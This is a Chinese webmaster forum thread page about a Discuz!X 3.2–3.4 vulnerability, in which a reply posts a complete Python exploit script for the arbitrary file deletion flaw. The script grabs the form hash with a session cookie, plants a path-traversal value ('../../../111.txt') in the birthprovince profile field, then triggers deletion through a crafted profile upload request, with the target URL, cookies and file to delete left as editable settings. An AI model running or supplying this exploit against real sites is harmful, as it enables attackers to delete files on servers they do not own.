2. 程序综合区
  3. Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞

2核1G3M服务器88一季度

腾讯云,阿里云百度云等 折扣价→点我←

Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞 discuz 交流

游客1 游客组
站长窝论坛版权声明 1、本帖标题:Discuz!X3.4 X3.3 X3.2永久删除你在任何DZ论坛的帐号漏洞
2、论坛网址:站长窝论坛
3、站长窝论坛的资源部分来源于网络,如有侵权,请联系站长进行删除处理。
4、会员发帖仅代表会员个人观点,并不代表本站赞同其观点和对其真实性负责。
5、站长窝论坛一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本帖由游客1在站长窝论坛《程序综合区》版块原创发布, 转载请注明出处!
收藏的用户(0 X
正在加载信息~
上一篇:推荐个加壳可在手机做面打开的方式
下一篇:linux系统SSL证书部署https单/多站点教程
评论
最新回复 (186)
  • momoxiao 一级用户组
    引用 68
    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import requests
    import re
    import urllib2

    ‘‘‘
    Discuz!X ≤3.4 任意文件删除漏洞
    Write by Aaron
    ‘‘‘

    def get_cookie():
    cookies={}
    for line in raw_cookies.split(‘;‘):
    key,value=line.split(‘=‘,1)
    cookies[key]=value
    return cookies
    def get_formhash(url):
    cookies=get_cookie()
    testurl=url+"/home.php?mod=spacecp"
    s=requests.get(testurl,cookies=cookies)
    com = re.compile(‘<input type="hidden" name="formhash" value="(.*?)" />‘)
    result = com.findall(s.text)
    return result[0]
    def del_step1(url,filename):
    headers={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
    geturl=url+"/home.php?mod=spacecp&ac=profile&op=base"
    formhash=get_formhash(url)
    payload ={‘birthprovince‘:filename,"profilesubmit":1,"formhash":formhash}
    cookies=get_cookie()
    r = requests.post(geturl,data=payload,headers=headers,cookies=cookies)
    if r.content.find(‘parent.show_success‘)>0:
    print ‘Step1 success!!!‘
    def del_step2(url):
    geturl=url+"/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa"
    heads={‘User-Agent‘:‘Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0‘}
    formhash=get_formhash(url)
    files ={‘formhash‘:(None,formhash),‘birthprovince‘:(‘1.jpg‘,open(‘1.jpg‘,‘rb‘),‘image/jpeg‘),‘profilesubmit‘:(None,‘1‘)}
    cookies=get_cookie()
    r=requests.post(geturl,files=files,headers=heads,cookies=cookies)
    if r.text.find(‘parent.show_success‘)>0:
    print ‘Step2 success!!!‘

    if __name__ == ‘__main__‘:
    #需要修改以下三个参数:
    #1、设置cookie
    raw_cookies="G2pl_2132_sid=sKKQZK; G2pl_2132_saltkey=Sz3Zk9qK; G2pl_2132_lastvisit=1506772875; G2pl_2132_lastact=1506779386%09home.php%09spacecp; G2pl_2132_seccode=7.aa0407e77fa5c31c1b; G2pl_2132__refer=%252Fhome.php%253Fmod%253Dspacecp%2526ac%253Dprofile%2526op%253Dbase; G2pl_2132_ulastactivity=d085JjIjS5HiG3obxleJQuw0zNYpIN60OXJV0J6di%2B8aFmKQ4u6l; G2pl_2132_auth=86c5F09hGuaZuGNPSX7Pr7Oy4Mq2B39nSviv%2FRFC8vdn1Zjb9PibvU2fN4jJr9Hr7yVNf2vH9rIXrSLWhMZk; G2pl_2132_nofavfid=1; G2pl_2132_sendmail=1; G2pl_2132_noticeTitle=1"
    #2、设置删除的文件
    filename="../../../111.txt"
    #3、设置url
    url="http://127.0.0.1"
    del_step1(url,filename)
    del_step2(url)
    2018/07/20 20:58:01 取消查看 回复
返回
发新帖
作者最近主题
相关贴子